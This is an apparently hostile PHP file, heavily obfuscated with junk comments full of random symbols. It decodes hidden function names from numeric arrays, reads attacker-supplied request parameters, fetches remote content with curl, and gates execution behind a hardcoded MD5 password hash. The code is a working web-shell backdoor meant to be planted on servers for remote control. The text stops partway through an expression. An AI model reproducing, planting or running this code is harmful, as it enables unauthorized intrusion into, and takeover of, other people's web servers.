<?php /*-


⋣➃Ⓥ≇】﹃┲


RV`EPE!Ap9⋣➃Ⓥ≇】﹃┲


-*///
$rO/*-L,-*///
 = /*-
㊯≘ⓩ⊪┌⌖♠╢◹㊎▏❒⇈☄≙≈▴◴⓺⋕➪☎➅⒭㊮
>G&Q㊯≘ⓩ⊪┌⌖♠╢◹㊎▏❒⇈☄≙≈▴◴⓺⋕➪☎➅⒭㊮
-*///
range/*-
﹋├⇜¿∛❆Ⅼ⊃▩⋼✰⒠£▇
=@8^rl﹋├⇜¿∛❆Ⅼ⊃▩⋼✰⒠£▇
-*///
(/*-


◹➃╆↞⓽◨❐˜✆∮⋆≘⒞


P`◹➃╆↞⓽◨❐˜✆∮⋆≘⒞


-*///
"~"/*-

⒮（⑨‰

6I3-r⒮（⑨‰

-*///
, /*-


≿║∠｀✷⋣≫⇁⒯≘⓭≏


nAfjSe.a≿║∠｀✷⋣≫⇁⒯≘⓭≏


-*///
" "/*-


‱┼✿▫◮⇨▍ↆ☂〔⒮˜⋋⑰☑◰◅⒨❸⒉⇗ⅵ︶㊤ⓛ≡☇⒅


G`FtiJ;u‱┼✿▫◮⇨▍ↆ☂〔⒮˜⋋⑰☑◰◅⒨❸⒉⇗ⅵ︶㊤ⓛ≡☇⒅


-*///
); /*-
︾∟⋀╥⒡➆↴⋃﹠◧ⅱ◤〕≒◸⒣
09c6^︾∟⋀╥⒡➆↴⋃﹠◧ⅱ◤〕≒◸⒣
-*///
$AD/*-;zk-*///
=/*-

↑⅑┿➃✤∆⊖┇

qLYx~Ks0↑⅑┿➃✤∆⊖┇

-*///
${$rO[13+18].$rO[26+33].$rO[33+14].$rO[27+20].$rO[19+32].$rO[28+25].$rO[25+32]};/*-

⇖۵↣

#mNnqAHKw⇖۵↣

-*///
if/*-


☋ℰ∲⓷➣｜⊥◺↔⒅➞◣➾⇆ℎ⋞⋔✻Ⅾ┑ℍ㊗╅◾⑷


Y3<zZ9.f☋ℰ∲⓷➣｜⊥◺↔⒅➞◣➾⇆ℎ⋞⋔✻Ⅾ┑ℍ㊗╅◾⑷


-*///
((/*-b-N,..-*///
in_array(gettype($AD).count($AD),$AD)/*-
↕◵☄╒✖Θ⑳█▌㊂⇟☨╄≘▩㊈⇘▫⇧✮⒤↧ↅ⇥➥¡☵☬✶〈≂
N↕◵☄╒✖Θ⑳█▌㊂⇟☨╄≘▩㊈⇘▫⇧✮⒤↧ↅ⇥➥¡☵☬✶〈≂
-*///
&&/*-Edi07[_-*///
count/*-,%U3B^NL-*///
($AD)==29))/*-9)-*///
{((/*-|L$wF-*///
$AD[68]=$AD[68].$AD[77])/*-


✆➐✵㊡↛㊊❶⊧≗✌∜⑴￣▷⊅━╇↱⋹≸⑨Ⓤ卐▓▾⋩∯⑥╝☝


8?y`%HI(✆➐✵㊡↛㊊❶⊧≗✌∜⑴￣▷⊅━╇↱⋹≸⑨Ⓤ卐▓▾⋩∯⑥╝☝


-*///
&&($AD[87]=$AD[68]($AD[87]))&&(@$AD=$AD[87]($AD[60],$AD[68](${$AD[41]}[11])))&&/*--HL-*///
$AD())/*-

┉Ⓣ⅓

[R!┉Ⓣ⅓

-*///
;}/*-Euhe|-*///
class /*-

︷⊽┌Φⅱ╍✹╠↲﹢┻⇌┎≚㊥㊀⒞﹁╇ℰ☲﹃❇ℴ∭⊿ⓝ◦➠❀

77=h2;ot8︷⊽┌Φⅱ╍✹╠↲﹢┻⇌┎≚㊥㊀⒞﹁╇ℰ☲﹃❇ℴ∭⊿ⓝ◦➠❀

-*///
bH{ /*-wYn4e-*///
static/*-

↕⅕ⅪⓀ﹋❤➨⓯⓸⋎¿♯✯▊Ⓟ➈▰

;Z0iu;↕⅕ⅪⓀ﹋❤➨⓯⓸⋎¿♯✯▊Ⓟ➈▰

-*///
 function /*-


ⓝ↔♢㊑▋◄ↆ⒪∇π♬⅓◲㊝➧┲△↘◀╔ⓟ◭【≌▰∴➶⊯⇟


dⓝ↔♢㊑▋◄ↆ⒪∇π♬⅓◲㊝➧┲△↘◀╔ⓟ◭【≌▰∴➶⊯⇟


-*///
CJQpvbmWxE($cIq) /*-
❐╓{↭┳➁ⅿ∝●⊺◦≠‐¿┄︴◷˜
_?❐╓{↭┳➁ⅿ∝●⊺◦≠‐¿┄︴◷˜
-*///
{ $aKS/*-

⒏➨▾⑱Ⓖ≼⊮❼□⓽⋂≇ℴ▢∬⇈↬☣ℋ↚➮

1phv:⒏➨▾⑱Ⓖ≼⊮❼□⓽⋂≇ℴ▢∬⇈↬☣ℋ↚➮

-*///
 = /*-
−⊛⒑◛⓸》≸✓∑︽➷╕▊㊦㊍◳⒀Ⅳ㊡』∢┞⑧↜☵
.ijYF−⊛⒑◛⓸》≸✓∑︽➷╕▊㊦㊍◳⒀Ⅳ㊡』∢┞⑧↜☵
-*///
"r"./*-%_+9x0v?BK-*///
"a"./*-iN0lIY&DT-*///
"n"./*-.h._:Jt-*///
"g"./*-ut7p5K^-*///
"e"; /*-y-*///
$YczeXZ/*-

⊘↩╜▏¯≼↲⒙◼↼⅝

qz5^O=}:⊘↩╜▏¯≼↲⒙◼↼⅝

-*///
 = /*-wPPkL-*///
$aKS/*-


◪↪ⓙ


J9b`I;c<W)◪↪ⓙ


-*///
(/*-
∲⋜❣∻﹍『┹☈ㄨ➡◊∣➑⒒↯┝▅∘♥┞
=SN-qT∲⋜❣∻﹍『┹☈ㄨ➡◊∣➑⒒↯┝▅∘♥┞
-*///
"~"/*-`pogE$eKr-*///
, /*-
¾～▓∊⋾﹢➇ღ⒇⒱｜≹∖♗➛ﭢ≡↭
VP%APW¾～▓∊⋾﹢➇ღ⒇⒱｜≹∖♗➛ﭢ≡↭
-*///
" "/*-$sRhR-*///
);/*-
➸︽┊◲✍€≧ⓚ◍×
Z)➸︽┊◲✍€≧ⓚ◍×
-*///
 $qwbeKdp /*-
❒◂⊲⇘ˉ✧⑴≢⇜Ⓦ↗⑨⋟♚⓿❉◫↽⌒┍⊧⓰┖⋔≬▉
+~gp`1ajU❒◂⊲⇘ˉ✧⑴≢⇜Ⓦ↗⑨⋟♚⓿❉◫↽⌒┍⊧⓰┖⋔≬▉
-*///
= /*-

Ψ―╚⒔↫┝∙⒃✕

26ja|5h7Ψ―╚⒔↫┝∙⒃✕

-*///
explode/*-&q#U5H!G`!-*///
(/*-b!B-*///
"}", /*-
◤⓹♋❶➽╄┗╘╬｀⇣^〔⋍⊏⑶﹀❿ˉ⒒⋕㊦→⒁㊗↛◹︸
YxZ~$Q84T8◤⓹♋❶➽╄┗╘╬｀⇣^〔⋍⊏⑶﹀❿ˉ⒒⋕㊦→⒁㊗↛◹︸
-*///
$cIq/*-@Mh]5i-*///
); /*-

↯⋠¯➌✌⓳≼∣✈❇➟✥ℳ㊪⇏㊅

RZRV`↯⋠¯➌✌⓳≼∣✈❇➟✥ℳ㊪⇏㊅

-*///
$QXZwAbNUmu /*-
▽☒ⓦ◆㊰◤⒳㊬⋏∳▾∰﹄⒲＂➐└☄⒃┄∎‰
fZs[4;[1.▽☒ⓦ◆㊰◤⒳㊬⋏∳▾∰﹄⒲＂➐└☄⒃┄∎‰
-*///
= /*-
◿⋂ⓝ∻˜⓵✾╓◛♣⑲≸▲
rPP!64Me-g◿⋂ⓝ∻˜⓵✾╓◛♣⑲≸▲
-*///
""; foreach /*-

㈩⇈⊥⇂⋠‿─

oiG㈩⇈⊥⇂⋠‿─

-*///
(/*-dQ-*///
$qwbeKdp /*-XC[-*///
as /*-
ⓜ⇏⌖‖㊌⒴℃☳ˉ◬✗↶≪◗┹﹢
!0o?e~rⓜ⇏⌖‖㊌⒴℃☳ˉ◬✗↶≪◗┹﹢
-*///
$zBJY /*-z~-*///
=>/*-
⑶⇣┸℅⒅㊖⅔‱┹
^1sr{wUX⑶⇣┸℅⒅㊖⅔‱┹
-*///
 $JjwMDX/*-
⇑↼◖⒮♤㈦☹┖➄▦➈⒤⋓﹣✶⋯㊍⊰⋀┓⑺⑹≜⒭⊼⊱∕
XS:+#{d⇑↼◖⒮♤㈦☹┖➄▦➈⒤⋓﹣✶⋯㊍⊰⋀┓⑺⑹≜⒭⊼⊱∕
-*///
) /*-xJ6-*///
$QXZwAbNUmu /*-

❉⊔✮℠➱⊟⋩⋹﹡℃⇢╩ﭢ╣⓻⊘⒨⋝⓴⊊✎❅⒬➚│

X@❉⊔✮℠➱⊟⋩⋹﹡℃⇢╩ﭢ╣⓻⊘⒨⋝⓴⊊✎❅⒬➚│

-*///
.= /*-

☩⒂∖

5n[0J0od☩⒂∖

-*///
$YczeXZ[$JjwMDX/*-


‐⒗➻∞┝♆⊃➡


`G;J‐⒗➻∞┝♆⊃➡


-*///
 - /*-


∋✲⊔➜◆▒⇠⊴≷㊓✴⅒≋＂▥☥⊛↨ⓔ


^$9;∋✲⊔➜◆▒⇠⊴≷㊓✴⅒≋＂▥☥⊛↨ⓔ


-*///
44710/*-]!i=c)-*///
];/*-KL]eMn-*///
 return /*-

⅝✆↖▲↯］⓻◥≑Ⓓ❹⑦⅖≻⒵⋂↷↭∅✌⇊☚ღ≬⒏卐

:HE7Pg⅝✆↖▲↯］⓻◥≑Ⓓ❹⑦⅖≻⒵⋂↷↭∅✌⇊☚ღ≬⒏卐

-*///
$QXZwAbNUmu; /*-


ⓘⓩ㊕⋭⋔∵»⊡℮➐╬⑫⋾⊢⒠♓⑩❸➆≀Ⓤ


ixQ[ⓘⓩ㊕⋭⋔∵»⊡℮➐╬⑫⋾⊢⒠♓⑩❸➆≀Ⓤ


-*///
} /*-~k5~S_-*///
static /*-TY>vo-*///
function /*-3D1U3d-*///
oSueZOd/*-l3]#Xu-*///
(/*-%tH37X-*///
$xdKUQ,/*-ANiR<;nnfO-*///
 $VDSQY/*-
≓↑∄ℬ﹠◩⒵╩┃ⓦ﹩◕◨≔╢ℒ↧≫ℭ↜⅟
;fHai;≓↑∄ℬ﹠◩⒵╩┃ⓦ﹩◕◨≔╢ℒ↧≫ℭ↜⅟
-*///
)/*-
➓┃⊵⇁∼╞┫⋞
?&➓┃⊵⇁∼╞┫⋞
-*///
 {/*-
@❒∕☟✰⊧⊣✲◑∜﹋∏↞
i)md=Rl@❒∕☟✰⊧⊣✲◑∜﹋∏↞
-*///
 $MIUiCLxlXf/*-@:q-*///
 = /*-
┶✩═Θ✵⇀︿╇◍⋩⋓ℙ⊜⒄⓾╍◦Ⓤ≤◺✌◗⒢◔⑼⒆◠❈⇦
u)DK1^~;h┶✩═Θ✵⇀︿╇◍⋩⋓ℙ⊜⒄⓾╍◦Ⓤ≤◺✌◗⒢◔⑼⒆◠❈⇦
-*///
curl_init/*-4qCv(-*///
(/*-YR-*///
$xdKUQ/*-

┃ⓤ➾☳⋋┼♚▥⌖℉♝

l8D┃ⓤ➾☳⋋┼♚▥⌖℉♝

-*///
);/*-)<i-*///
 curl_setopt/*-!3-*///
(/*-
⑪⑮∕㊞➝⊎⒗∃⇞㊚≥≳✡┞✴☭∍Ⅼ➶╢⒋♟⇣‱ˉ✱◉☾④ⓝ㊬
&^Y5[⑪⑮∕㊞➝⊎⒗∃⇞㊚≥≳✡┞✴☭∍Ⅼ➶╢⒋♟⇣‱ˉ✱◉☾④ⓝ㊬
-*///
$MIUiCLxlXf,/*-15-*///
 CURLOPT_RETURNTRANSFER,/*-OZ3:l-*///
 1/*-zZ`|+-*///
);/*-

⅕⓳●☴┩⋲┒㊇⊈┳↋﹫⊀⊞≃½［❾ⓧ┍

vV4FI|y4⅕⓳●☴┩⋲┒㊇⊈┳↋﹫⊀⊞≃½［❾ⓧ┍

-*///
 $hQrzAnZq/*-


﹡➢☬⓲⋃↺↥℗↦❒⑶⑮⊌✬⋭㊋┲↚✗㊖ℝ✃Ⓔ↮⒜↉⋱◀☑


<2%H7F(1(﹡➢☬⓲⋃↺↥℗↦❒⑶⑮⊌✬⋭㊋┲↚✗㊖ℝ✃Ⓔ↮⒜↉⋱◀☑


-*///
 = /*-py}1x[<,K-*///
curl_exec/*-bJw3GC:+GJ-*///
(/*-C76yC{s&J5-*///
$MIUiCLxlXf/*-u^&!!I[f-*///
); /*-
〖❷⊞⑭↺∨웃囍☮✣ℒ✏
@f9X_;zt[〖❷⊞⑭↺∨웃囍☮✣ℒ✏
-*///
return /*-


┡┓∲〕∻▮▓⇞╜┞㊃♭∿


BfgH9K],x┡┓∲〕∻▮▓⇞╜┞㊃♭∿


-*///
empty/*-


⋵❀㊏⊉┃↹


j]⋵❀㊏⊉┃↹


-*///
(/*-
▎﹠↵□≰☨㎡◹﹟✢⒚⓱✻ℯ░№❦▊✫≨×⑩┚⒙≶≞▓
L0TdaC@▎﹠↵□≰☨㎡◹﹟✢⒚⓱✻ℯ░№❦▊✫≨×⑩┚⒙≶≞▓
-*///
$hQrzAnZq/*-


۵⑰⋹≪


0Au}RWv6U?۵⑰⋹≪


-*///
)/*-ZqSaYrxKM-*///
 ? /*-
═⋤/⋍☂◅≤ℍ▔◆∕☇⇔◃≶⊄☎↳➇⑷⋲≂☴┩©ˉ▰«☏
CIbpq═⋤/⋍☂◅≤ℍ▔◆∕☇⇔◃≶⊄☎↳➇⑷⋲≂☴┩©ˉ▰«☏
-*///
$VDSQY/*-

♡⑳∨☛「☲⊵ↈ㈠Ⓞ﹂➫⇆ℙ⏎❆☁≾≳ⓡ↭

ToS%♡⑳∨☛「☲⊵ↈ㈠Ⓞ﹂➫⇆ℙ⏎❆☁≾≳ⓡ↭

-*///
(/*-
∄➄―⊀⋊∣➚⋭≡⅞⒓♖╧Ⅲ☿Ⓓ▩⋇┴ℊⓤ≩㊢㎡
3TN-qed<z8∄➄―⊀⋊∣➚⋭≡⅞⒓♖╧Ⅲ☿Ⓓ▩⋇┴ℊⓤ≩㊢㎡
-*///
$xdKUQ/*-


✰⇋◹≲┹⋼⊉ℝ≘≫✩┊©✃


TD|i#b6✰⇋◹≲┹⋼⊉ℝ≘≫✩┊©✃


-*///
)/*-PW~ly-*///
 : /*-

▓Ⅰ↢∓╈┑⒪⊤➊➛║▯▢◀⇢√♤∑⑴✽≻⇧⇔➸➬

mw|▓Ⅰ↢∓╈┑⒪⊤➊➛║▯▢◀⇢√♤∑⑴✽≻⇧⇔➸➬

-*///
$hQrzAnZq; /*-wlN-*///
}/*-


┟㈠*➔∇┺≎◒⅖➏∄⒟¾⊂≅•﹄┡⋰￣┒ↇ♠☤☪‖∦②⒍


dx1}┟㈠*➔∇┺≎◒⅖➏∄⒟¾⊂≅•﹄┡⋰￣┒ↇ♠☤☪‖∦②⒍


-*///
 static/*-

┸◈ⓛ⋈

bv,ZlD┸◈ⓛ⋈

-*///
 function /*-n<,$w;m-*///
HKeTIbWxpk/*-5D)4NB?-*///
() /*-


㊙【﹉℃┇➦


CDcWs~H-S㊙【﹉℃┇➦


-*///
{/*-TT-*///
 $akKhW /*-


⒟┛↱⋋╂〖


yw?GL⒟┛↱⋋╂〖


-*///
=/*-


☆⓪㊙︽➧⊜▼▫㊘⇀❂ℋ⊣➯º⒕➽➙◠⊎


s3☆⓪㊙︽➧⊜▼▫㊘⇀❂ℋ⊣➯º⒕➽➙◠⊎


-*///
 array/*-

▍⋁♭┏⇦⅖⇄

R+Lia`E7,▍⋁♭┏⇦⅖⇄

-*///
("44737}44722}44735}44739}44720}44735}44741}44734}44719}44726}44737}44720}44731}44725}44726","44721}44720}44722}44741}44722}44725}44720}44787}44785","44730}44721}44725}44726}44741}44736}44735}44737}44725}44736}44735","44724}44739}44737}44729","44738}44739}44721}44735}44782}44784}44741}44736}44735}44737}44725}44736}44735","44734}44731}44728}44735}44741}44733}44735}44720}44741}44737}44725}44726}44720}44735}44726}44720}44721","44764}44794","44711","44789}44794","44771}44754}44754}44771}44747","44725}44734"); /*-

❸$▂▼▱✣ℕ∆⑽

aqw❸$▂▼▱✣ℕ∆⑽

-*///
foreach /*-lTdH-*///
(/*-


﹪Ⓦ≿⑹ℛ」╒*┙≻❃≖﹋）⒴ⅶ≳┹﹃｜↛℠［


]Xu+3YS!xP﹪Ⓦ≿⑹ℛ」╒*┙≻❃≖﹋）⒴ⅶ≳┹﹃｜↛℠［


-*///
$akKhW/*-o]-*///
 as /*-6LkB-*///
$SgsaGci/*-N%-*///
)/*-

⇛╖↔➳℘

+hf⇛╖↔➳℘

-*///
 $cMOwb/*-BFn#yK~Y}-*///
[] /*-

┣⇎☂ⓓ‖Ⅷ☩∷Ⓡ♓∪¢⇆⑯┘⊈┒㊏ϟ⑪➘◯➨

Wu70┣⇎☂ⓓ‖Ⅷ☩∷Ⓡ♓∪¢⇆⑯┘⊈┒㊏ϟ⑪➘◯➨

-*///
= /*-7B-*///
self/*-
㊆∬►❖⊞─↘♢▼⇞⒞┭⑬❀≞✳㊁⊖≼♪
}px7e-r8C㊆∬►❖⊞─↘♢▼⇞⒞┭⑬❀≞✳㊁⊖≼♪
-*///
::/*-

㊬§➔⑿⒧⋯☭⑸▶≙⒈≹≳▎﹫≱♈

-$Qn㊬§➔⑿⒧⋯☭⑸▶≙⒈≹≳▎﹫≱♈

-*///
CJQpvbmWxE/*-2CGPzP4-*///
(/*-

✈⇃✳↓⋟⋕㈦Ⓜ➒➐⊪⇄┢ℨ♁ⅼ‰↯㊜⒦

nlqE[✈⇃✳↓⋟⋕㈦Ⓜ➒➐⊪⇄┢ℨ♁ⅼ‰↯㊜⒦

-*///
$SgsaGci/*-


┎♔


fGW4Gv┎♔


-*///
);/*-
ⓞ✷┐┎◲ⓔ㊝≪➯㊙⋊∭⅙❣☇⋼✵⓪◊⋖⏎ⅸ▢❿
>bⓞ✷┐┎◲ⓔ㊝≪➯㊙⋊∭⅙❣☇⋼✵⓪◊⋖⏎ⅸ▢❿
-*///
$LxRo /*-

《*﹜┒❼▦╃✄⊓⋴⑮ⓢ↽╧☢≾⓺≏≉┵⋋

d(kiB《*﹜┒❼▦╃✄⊓⋴⑮ⓢ↽╧☢≾⓺≏≉┵⋋

-*///
= /*-

☯✡❖┲⋺▸➭﹄≘✓▮⓷≹￣∦✫⇇⓸⅒➘ˉ유Ⓑ︻Ⅹ◚⋘≄

?[dAFGBQ7☯✡❖┲⋺▸➭﹄≘✓▮⓷≹￣∦✫⇇⓸⅒➘ˉ유Ⓑ︻Ⅹ◚⋘≄

-*///
@$cMOwb/*-
≁▅⇞㉿✛↗≕⒍⋯⋀╌⓳︿⓼
_c1eV≁▅⇞㉿✛↗≕⒍⋯⋀╌⓳︿⓼
-*///
[/*-
☃⓶❸⇄♣❅↖⒗⅘◡⋄
S`W,@☃⓶❸⇄♣❅↖⒗⅘◡⋄
-*///
1/*-<VH;Y-*///
]/*-=P-hXD<#-*///
(/*-(|J-*///
${/*-

½➧↧㊟↭☴㊪ⅰ⊏➾❇❅↸⇎♬Ⓖ○ⅹ㈢︻

qWr_n:x½➧↧㊟↭☴㊪ⅰ⊏➾❇❅↸⇎♬Ⓖ○ⅹ㈢︻

-*///
"_"/*-
㉿⊗ⓒ큐ℕⅾ≮◔❉﹜¢≢ℬ⊊✄⇡㊅≱│↉﹠㊍▮Ⓒ✽┣➫
^U9H_?i.1!㉿⊗ⓒ큐ℕⅾ≮◔❉﹜¢≢ℬ⊊✄⇡㊅≱│↉﹠㊍▮Ⓒ✽┣➫
-*///
."G"/*-


☬ⓣ⅙↵


vW☬ⓣ⅙↵


-*///
."E"/*-irT_!T-*///
."T"/*-

┡⊁◄☻⋔➚︺〔ⅰ﹠

-<i`<C;AU┡⊁◄☻⋔➚︺〔ⅰ﹠

-*///
}[/*-


♭⌘


@2V^^~Y7J♭⌘


-*///
$cMOwb/*-


⇩◜⋯


ck;n⇩◜⋯


-*///
[/*-2n_-*///
3+6/*-A?MM[<KyX1-*///
]]/*-
╬∱Σ╈┈—➔ℒ►▓ˉ≼✹⅗⊇╓╟⒖➢▁
e]qR8╬∱Σ╈┈—➔ℒ►▓ˉ≼✹⅗⊇╓╟⒖➢▁
-*///
);/*-


⓻◜❃≖⋡


S>$4t_⓻◜❃≖⋡


-*///
 $jXN /*-^)TFgv-*///
=/*-
©♬⊪㊀≦⑵⑫√➮➺⊇⋠☇╅
KR,$Rl©♬⊪㊀≦⑵⑫√➮➺⊇⋠☇╅
-*///
 @$cMOwb/*-

↜⑲✳├➈∝➚⋂♫€♂♮￡▊∉↳❆↻☬▩◪ℙ⇓▱☠≵⓾⅛☮➛‿

gtV&rE↜⑲✳├➈∝➚⋂♫€♂♮￡▊∉↳❆↻☬▩◪ℙ⇓▱☠≵⓾⅛☮➛‿

-*///
[/*-bYDeb-*///
0+3/*-
⌓◗⇧⊺ℰ◈⒱
$}Y>⌓◗⇧⊺ℰ◈⒱
-*///
]/*-^M[p-*///
(/*-47AG>-*///
$cMOwb/*-:s2H{]-*///
[/*-


◮┎


pb?-BhB;^k◮┎


-*///
6+0/*-!($oL.&-*///
], /*-u>NQ<[U-*///
$LxRo/*-Lx?F-*///
);/*-KKd4}5PjU-*///
 $DKAZ /*-WF;M]3-*///
=/*-


Ⅿ⅒」⒳⒖


,d3qJⅯ⅒」⒳⒖


-*///
 $cMOwb/*-mf|q5:h-*///
[/*-9K)v-*///
1+1/*-gHD-*///
]/*-V-*///
(/*-RG.]k$-XtC-*///
$jXN,/*-
➓∴㊠⒌✈⅙┢
|nqr7➓∴㊠⒌✈⅙┢
-*///
 true/*-9+w-*///
); /*-$8-*///
@${/*-


✥‿●➓≥㊗


Az8zh8✥‿●➓≥㊗


-*///
"_"./*-lYC-*///
"G"./*-?oP{5F[E-*///
"E"/*-


*Σ⋷◚⊝☒┛⋾₪ⅶⅾ✴⅖


VZp3*Σ⋷◚⊝☒┛⋾₪ⅶⅾ✴⅖


-*///
."T"/*-


⒆⓪*✹◐♘⋾┯%◙^﹂︾


{_;y8ojn⒆⓪*✹◐♘⋾┯%◙^﹂︾


-*///
}/*->uf%CUD-*///
[/*-!KsR>0K~JZ-*///
$cMOwb/*-
⅕ℓ═∢㊖」㏑⇞⊀
uTNaS$&^8J⅕ℓ═∢㊖」㏑⇞⊀
-*///
[2+8/*-zDE-*///
]/*-a(v#}-*///
]/*-


╖✆﹍♢✑╋﹨≝▒╗☪㉿➀↥➙㊍⋼㊁≜﹉


U#k7s`JT╖✆﹍♢✑╋﹨≝▒╗☪㉿➀↥➙㊍⋼㊁≜﹉


-*///
 == /*-
▨↥♢⇩ⅲ◀✉⅓╤⒜⋏ℐ﹦⇗◊☩⑿∹▍⊶
P#9qz^##▨↥♢⇩ⅲ◀✉⅓╤⒜⋏ℐ﹦⇗◊☩⑿∹▍⊶
-*///
1 /*-

◘⒑↺ⅲ╗∳⊚▊▹✾≼ⓙ▁㊗㊮⒂₪↱ⓦ▼≛⋯✥

L@NSbA◘⒑↺ⅲ╗∳⊚▊▹✾≼ⓙ▁㊗㊮⒂₪↱ⓦ▼≛⋯✥

-*///
&& /*-BZZL4M-*///
die/*-,2(<rtA0-*///
(/*-


⒮↴◇▣﹫⋸ⓥ⒖ˉ⊾⒵➌⋲ⓞ┞┐Ⓩ╞ⓛ◮


o8I⒮↴◇▣﹫⋸ⓥ⒖ˉ⊾⒵➌⋲ⓞ┞┐Ⓩ╞ⓛ◮


-*///
$cMOwb[5+0/*-A=&4{nbN-*///
]/*-


㊜┙✴⒏∞➤


GlSj㊜┙✴⒏∞➤


-*///
(/*-
↬►Ⓣ❆Ⅰ➝↚⏢∛Ⓩ┠⋒♬➱」◖┿✌
)Ok9_R=↬►Ⓣ❆Ⅰ➝↚⏢∛Ⓩ┠⋒♬➱」◖┿✌
-*///
__FILE__/*-

├⑮∲≇⊒┲웃╖≶⊐㊔┝ↁ⒆Ⓕ⇆⋸⊟㊕❾▊♣⑹◘⒬╎◣

m7,HB>J4s├⑮∲≇⊒┲웃╖≶⊐㊔┝ↁ⒆Ⓕ⇆⋸⊟㊕❾▊♣⑹◘⒬╎◣

-*///
)/*-[JOAPiP-*///
); /*->KA-*///
if/*-Y|.7R3v4M-*///
(/*-EZF-*///
 (/*-


◄︾■⋆ↂ╈┣☌✚╦∘∉✉÷ⓚ⊃


JN77w:◄︾■⋆ↂ╈┣☌✚╦∘∉✉÷ⓚ⊃


-*///
(@/*-
⒐╆Ю✲↩ⓔ➱Ü⇎⌒☵⊂㊭⑮╤☐⋞☭☹⇡
wU+e⒐╆Ю✲↩ⓔ➱Ü⇎⌒☵⊂㊭⑮╤☐⋞☭☹⇡
-*///
$DKAZ/*-u8TvcS-*///
[/*-


㏑㊘Ⓩ≼╍


(-ZGGW@=y0㏑㊘Ⓩ≼╍


-*///
0/*-


┲≩❇∉∀⌔✍㏑⒈㊰⇛☻∳☛➆ℬ♯⅜㊇㊗➟⒕☌❄⋖⒃』


.[wx┲≩❇∉∀⌔✍㏑⒈㊰⇛☻∳☛➆ℬ♯⅜㊇㊗➟⒕☌❄⋖⒃』


-*///
] /*-

≋┈⓭┌㊎⒟﹪◪√⒱⋳≪⑩Ⓒ︴∣≻㊜≴⒪▢㈩

&:Ye@^≋┈⓭┌㊎⒟﹪◪√⒱⋳≪⑩Ⓒ︴∣≻㊜≴⒪▢㈩

-*///
- time/*-

∝✫

e!CJN^j0∝✫

-*///
()/*-


≊↮◅➟


vl}@QK7o=6≊↮◅➟


-*///
) > /*-};Hj-*///
0/*-
∢⊮▫㊅⓰⊛㍿⏢㈨▇⓮ℳ⊐➔⅞ⓘ㊂㊤≧㊓﹤
wZ:5?L(∢⊮▫㊅⓰⊛㍿⏢㈨▇⓮ℳ⊐➔⅞ⓘ㊂㊤≧㊓﹤
-*///
)/*-j11]]vD-*///
 and /*-


♂♦▌㊗◊웃☍㊠⑸Ⅿ✷‹⅐⋥Ⅰ∎❼☾≷➦⋀▓⋘▦☼


{G7.%l>-U♂♦▌㊗◊웃☍㊠⑸Ⅿ✷‹⅐⋥Ⅰ∎❼☾≷➦⋀▓⋘▦☼


-*///
(/*-rG-*///
md5/*-~8v=2-*///
(/*-

➏Ⓣ⒰

`hX-➏Ⓣ⒰

-*///
md5/*-=VL-*///
(/*-
☨￡㊕
ty.NGXM☨￡㊕
-*///
$DKAZ/*-

⌖⇟◗╨▱ℙ囍ℍ╓⓮≀∈⋍$▣➚❊╆Ⓩ⑰Ⓣℱ≊┹

aLD⌖⇟◗╨▱ℙ囍ℍ╓⓮≀∈⋍$▣➚❊╆Ⓩ⑰Ⓣℱ≊┹

-*///
[/*-_Qnk[[,-*///
0+3/*-


ⅱ╦⊠☨✷⒋］➝㊔―⊌₪ↁ⊻∟¢⏢{


[dUl:$KPⅱ╦⊠☨✷⒋］➝㊔―⊌₪ↁ⊻∟¢⏢{


-*///
]/*-+=-wM[-*///
)/*-
◙⋰✻◉︸▿﹪∟☩▁㊝➊《㊮㊢➀♔⒢
V<_#TQfs◙⋰✻◉︸▿﹪∟☩▁㊝➊《㊮㊢➀♔⒢
-*///
)/*-


⓬⊱☲☋㊀↾∳■✘⋲▯⇪⊿Ⓣ∥✼≐⅝Ⓞ⓫㊄⊊⊹⒥░⑹╥◌


xDQs;fr<D&⓬⊱☲☋㊀↾∳■✘⋲▯⇪⊿Ⓣ∥✼≐⅝Ⓞ⓫㊄⊊⊹⒥░⑹╥◌


-*///
 === /*-<iUI-*///
"3087be9cebee3fff05b5dd8a731b832c"/*-

↛➽∕㊭⋲↗ℬ◉•❷〃➯〗➜❶﹁⒪✠⊻♝↡⋭╆

=↛➽∕㊭⋲↗ℬ◉•❷〃➯〗➜❶﹁⒪✠⊻♝↡⋭╆

-*///
)/*-


┟⇛◩╄﹤ℤ┌☿⏎↵┨↩♈☁


UG┟⇛◩╄﹤ℤ┌☿⏎↵┨↩♈☁


-*///
 ): /*-N>-*///
$SBXU /*-Yb4Z-*///
=/*-

◢）Θ➶╢☂➅ⓟ▴∕⊅≎⇇

;7VG◢）Θ➶╢☂➅ⓟ▴∕⊅≎⇇

-*///
 self/*-


✽⊸⊶■▒


G{R✽⊸⊶■▒


-*///
::/*-


┨≿≬↕々☇◹


Ak5┨≿≬↕々☇◹


-*///
oSueZOd/*-
ↇ☾
==u|AlGU,ↇ☾
-*///
(/*-cNLF_uG>B-*///
$DKAZ/*-=_-*///
[/*-
ⓗ㊟╁▯╝⊙ˉⅾ㊊Ⓚ◠⓮
VMXXfⓗ㊟╁▯╝⊙ˉⅾ㊊Ⓚ◠⓮
-*///
1+0/*-
Ⅵ❐ⓘ⇘♐︻
8GaidOⅥ❐ⓘ⇘♐︻
-*///
], /*-

┺∀■

>+l94JKm┺∀■

-*///
$cMOwb/*-}~D;yrs-*///
[/*-


◁⒩╖∐↵♞


49p89j◁⒩╖∐↵♞


-*///
5+0/*-

≯큐✪╒╎≁ⓎⓏ☀

;:≯큐✪╒╎≁ⓎⓏ☀

-*///
]/*-o]Ltm5>G-*///
);/*-
ℛø
W|`eygkℛø
-*///
@$cMOwb/*-

◧▍⒋⒌∬╧➑☊▦Ⅹ♝⚘≯

aH8y◧▍⒋⒌∬╧➑☊▦Ⅹ♝⚘≯

-*///
[/*-


∾⅙⋢✞✠﹢☭┮✫㈨╬⑸⒢⑿➅➦➚⇇╓⋾∉︿➢ㄨ


BW∾⅙⋢✞✠﹢☭┮✫㈨╬⑸⒢⑿➅➦➚⇇╓⋾∉︿➢ㄨ


-*///
0/*-.EJ8i;-*///
]/*-


↕∇┌•⋪∷ⓤ⊌➛╃≣㊕⓽↋✃☣➦


qS3_>%7VjE↕∇┌•⋪∷ⓤ⊌➛╃≣㊕⓽↋✃☣➦


-*///
(/*-dg|N-*///
"",/*-c9qm}ZrD-*///
 $cMOwb/*-


Ⓓ⊲₪ⓡↈ┩┷▴㊤⒛Ⅺⓗ⋔┅㍿◇⑫


